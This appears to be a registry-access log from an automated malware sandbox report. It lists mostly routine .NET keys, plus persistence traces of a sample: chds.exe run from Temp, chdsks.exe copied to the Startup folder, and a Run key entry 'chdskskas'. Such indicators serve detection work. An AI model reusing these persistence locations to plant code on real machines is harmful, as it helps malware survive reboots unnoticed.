HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|chds.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|chds.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|chds.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1008786c\7da7a542
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1008786c\7ea37736
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chdsks.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|chdsks.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|chdsks.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|chdsks.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\chdskskas

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
